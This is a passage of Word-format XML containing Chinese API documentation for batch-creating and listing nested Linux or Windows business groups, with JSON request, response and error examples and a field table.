        <w:t xml:space="preserve">                                "name":"第四级业务组d2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                        "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d3的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d4的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "name":"第二级业务组b2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "description":"第二级业务组b2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c3的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d5",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d5的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C02A076" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD27501" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> external/api/assets/group/batch_create_group/linux</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name":"第一级业务组a",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description":"第一级业务组a的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "name":"第二级业务组b1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "description":"第二级业务组b1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d1的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d3的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d4",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d4的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                "name":"第二级业务组b2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "description":"第二级业务组b2的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "name":"第三级业务组c3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "description":"第三级业务组c3的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "name":"第四级业务组d5",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "description":"第四级业务组d5的描述",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                "sonGroup":[</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DF92A9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A3B6E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 200,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "message": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "data": "success"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A96C33A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>如果有错误，则返回结果如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CC60DC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 100,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "message": "数据结构不正确，存在name为空问题！[{\"sonGroup\":[{\"sonGroup\":[{\"name\":\"第四级业务组d1\",\"description\":\"第四级业务组d1的描述\"},{\"name\":\"第四级业务组d2\",\"description\":\"第四级业务组d1的描述\"}],\"name\":\"第三级业务组c3\",\"description\":\"第四级业务组d1\"},{\"sonGroup\":[{\"name\":\"第四级业务组d4\",\"description\":\"第四级业务组d4\"},{\"name\":\"第四级业务组d3\",\"description\":\"第四级业务组d3的描述\"}],\"name\":\"第三级业务组c1\",\"description\":\"第三级业务组c1的描述\"}],\"name\":\"\",\"description\":\"第二级业务组b2的描述\"},{\"sonGroup\":[{\"$ref\":\"$[0]\"},{\"sonGroup\":[{\"sonGroup\":[{\"name\":\"eeeee45\",\"description\":\"第四级目录eeeee45\"}],\"name\":\"eeeee33\",\"description\":\"第三级目录eeeee33\"}],\"name\":\"第二级业务组b1\",\"description\":\"第二级业务组b1的描述\"}],\"name\":\"\",\"description\":\"第一级业务组a的描述\"}]",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "data": "fail"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FACBB21" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="84" w:name="查询所有linuxwindows业务组"/>
      <w:bookmarkEnd w:id="83"/>
      <w:r>
        <w:t>查询所有linux|windows业务组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093A758" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口用于获取已经存在的linux（或者windows）业务组；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B87CA4F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536935E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET external/api/assets/group/{linux|win}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0645CCD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED0197D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>无 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506EB1E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AB5DBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> external/api/assets/group/linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6637A9F8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00808389" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">     {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": 254,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "eeee1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "relationshipName": "eeee1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "owner": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description": "第一级目录"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": 255,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent": 254,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "eeeee2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "relationshipName": "eeee1/eeeee2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "owner": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description": "第二级目录zi"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "id": 256,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent": 255,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "eeeee3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "relationshipName": "eeee1/eeeee2/eeeee3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "owner": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description": "第三级zison"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "id": 257,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "parent": 256,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "name": "eeeee44",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "relationshipName": "eeee1/eeeee2/eeeee3/eeeee44",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "owner": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "platform": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "description": "第四级目录test"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D42DC95"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925"/>
        <w:gridCol w:w="760"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="5694"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2C2FBD5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9153AB6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E7A43B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63849706" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70A2AF66" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="228F147C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E7E7736" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14B02198" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="440588EE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2362DB98" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69684965" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6611B0B6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FB523E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="732E9946" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DBAFC27" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组父id，parent=0,该业务组是第一层业务组，无父业务组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="247A8EB6" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60D490BD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55C195D3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E9DA075" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00219C6C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名（最多128个字符长度）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="528FE281" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CC1ADCB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>relationshipName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D350628" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="763A1C52" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E5D764B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
